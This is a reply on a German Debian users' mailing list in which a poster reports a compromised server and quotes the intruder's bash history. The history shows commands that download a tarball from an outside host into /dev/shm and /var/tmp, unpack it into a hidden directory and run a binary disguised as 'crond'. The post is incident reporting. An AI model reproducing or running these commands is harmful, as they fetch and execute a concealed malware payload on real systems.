Re: Veränderte Dateien finden

To: debian-user-german@lists.debian.org
Subject: Re: Veränderte Dateien finden
From: Jan Fricke <fricke@math.uni-siegen.de>
Date: Thu, 30 Nov 2006 12:10:12 +0100
Message-id: <[🔎] 456EBC14.8000307@math.uni-siegen.de>
In-reply-to: <7mRuN-8dn-11@gated-at.bofh.it>
References: <7mQfj-5y6-11@gated-at.bofh.it> <7mRuN-8dn-11@gated-at.bofh.it>

Peter Blancke wrote:

> Dann beschreibe uns doch einmal genau, was vorgefallen ist und wie
> Du es bemerkt hast. Solange werte ich Deine Aussage zu chkrootkit
> als Nullaussage. Ferner: Kennst Du die (in Debian nicht vorhandene)
> Software rkhunter?

Das root-Passwort wurde geändert. Die Bash-History war anscheinend nicht
gelöscht, und sie enthält folgende letzte Einträge:

uptime
uname -a
passwd
cd /dev/shm
wget www.freewebtown.com/aproape/cornelirina.tgz
 tar zxvf cornelirina.tgz
cd '. '
./crond
./crond
cd /var/tmp
wget www.freewebtown.com/aproape/cornelirina.tgz
 tar zxvf cornelirina.tgz
cd '. '
./crond
w
ps x
cd /var/tmp
wget www.freewebtown.com/aproape/cornelirina.tgz
tar zxvf cornelirina.tgz
cd '. '
./crond

Viele Grüße     Jan

Reply to:

Follow-Ups:
- Re: Veränderte Dateien finden
  - From: Frank Dietrich <bits_n_bytes@gmx.de>

Prev by Date: Re: Veränderte Dateien finden
Next by Date: Re: ssl 3.0 (nochmal ausführlicher)
Previous by thread: Re: Veränderte Dateien finden
Next by thread: Re: Veränderte Dateien finden
Index(es):
- Date
- Thread